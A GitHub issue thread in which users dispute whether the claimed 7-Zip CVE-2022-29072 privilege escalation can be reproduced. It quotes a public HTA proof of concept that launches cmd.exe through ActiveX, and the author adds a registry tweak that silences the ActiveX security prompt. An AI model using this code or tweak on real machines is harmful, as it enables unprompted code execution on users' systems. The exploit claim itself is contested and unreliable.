kagancapar / CVE-2022-29072

7-Zip through 21.07 on Windows allows privilege escalation and command execution when a file with the .7z extension is dragged to the Help>Contents area.
GNU General Public License v3.0
684 stars 104 forks source link

I can't reproduce #8

Open Easthrone opened 2 years ago

Easthrone commented 2 years ago

I can't reproduce the problem described in your video. what is the "privese.exe"? Is this what caused it?

HenkPoley commented 2 years ago

Most probably there is no issue.

If there actually is a privilege escalation, that bug is not an issue with 7zip or Microsoft® HTML Help Executable (HH.exe). But with Microsoft Windows.

Kağan Çapar keeps posting different explanations. The common theme for that would be, that there actually is no issue. He probably just tries to make a up a cloud of plausibility.

Kağan Çapar posted this file to Tavis Ormandy (from Google Zero). If you extract it, it might hose your NTFS (older Windows), or just drop hard to remove files ("just some naïve attempt at directory traversal that couldn't possibly work"). The file is made by/for jasonLyk. It does not show this exploit. It shows a different issue.

7zip by default does not run with elevated privileges. It should not be able to get them by itself. Unless there is an issue with Windows. If 7zip can do it, other programs should be able to as well.

If there is a bug, it is not a bug in 7zip.

kagancapar commented 2 years ago

That file doesn't even belong to me. I've been making fun of tavis since yesterday I don't have to send him the payload.

liudonghua123 commented 2 years ago

I could not reproduce either. When I try to drag a 7z file into the chm content window, I only got Do you want to open or save this file?.

https://user-images.githubusercontent.com/2276718/164577605-e8596058-1f04-4970-a97d-1212bca978d9.mp4

liudonghua123 commented 2 years ago

I create a HTML file which contains the public POC in https://dl.packetstormsecurity.net/2204-exploits/7zip-escalate.txt. And rename it to a 7z file. Then I got a warning. When I click yes, I can only get the current user shell, not the system user shell.

<html>
<head>
<HTA:APPLICATION ID="7zipcodeexec">
<script language="jscript">
var c = "cmd.exe";
new ActiveXObject('WScript.Shell').Run(c);
</script>
<head>
<html>

image

https://user-images.githubusercontent.com/2276718/164581174-2fcafd9f-9863-4c6c-8059-dabc302bf513.mp4

I also tried to drag the HTML file to the chm content window. IT IS THE SAME.

brlin-tw commented 2 years ago

@kagancapar

That file doesn't even belong to me. I've been making fun of tavis since yesterday I don't have to send him the payload.

Regardless of what that actually means I've made a Wayback Machine backup for future references, cheers!

kagancapar commented 2 years ago

Most probably there is no issue.

If there actually is a privilege escalation, that bug is not an issue with 7zip or Microsoft® HTML Help Executable (HH.exe). But with Microsoft Windows.

Kağan Çapar keeps posting different explanations. The common theme for that would be, that there actually is no issue. He probably just tries to make a up a cloud of plausibility.

Kağan Çapar posted this file to Tavis Ormandy (from Google Zero). If you extract it, it might hose your NTFS (older Windows), or just drop hard to remove files ("just some naïve attempt at directory traversal that couldn't possibly work"). The file is made by/for jasonLyk. It does not show this exploit. It shows a different issue.

7zip by default does not run with elevated privileges. It should not be able to get them by itself. Unless there is an issue with Windows. If 7zip can do it, other programs should be able to as well.

If there is a bug, it is not a bug in 7zip.

Even though I said that this file does not belong to me, you still continue to talk as if it is mine. I don't take you seriously, don't waste your breath for nothing. Don't stop insulting me on twitter. We are not even in the same class. I'm posting the link again this file is not mine it was purely done to troll Tavis.

https://tweetstamp.org/1515691512553742347

kagancapar commented 2 years ago

I create a HTML file which contains the public POC in https://dl.packetstormsecurity.net/2204-exploits/7zip-escalate.txt. And rename it to a 7z file. Then I got a warning. When I click yes, I can only get the current user shell, not the system user shell.

<html>
<head>
<HTA:APPLICATION ID="7zipcodeexec">
<script language="jscript">
var c = "cmd.exe";
new ActiveXObject('WScript.Shell').Run(c);
</script>
<head>
<html>

image

Video_2022-04-22_095533-converted.mp4 I also tried to drag the HTML file to the chm content window. IT IS THE SAME.

This is not the poc code of privesc attack. Also, a tip for you to bypass activex before working inside the payload. "[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0] If it checks "1201"=dword:00000000" and this DWORD has a value of 1, it will set it to 0 and the popup will be bypassed.

brlin-tw commented 2 years ago

@kagancapar

(...stripped...) The file is made by/for jasonLyk. It does not show this exploit. It shows a different issue.

Even though I said that this file does not belong to me, you still continue to talk as if it is mine.

False. Even Tavis themself has clearly attributed it correctly:

When I told him that, he said "that file doesn't belong to me anyway" - then explained he was planning his wedding and was too busy to answer more questions.

-- source


I'm posting the link again this file is not mine it was purely done to troll Tavis.

I failed to see how that behavior would help anyone.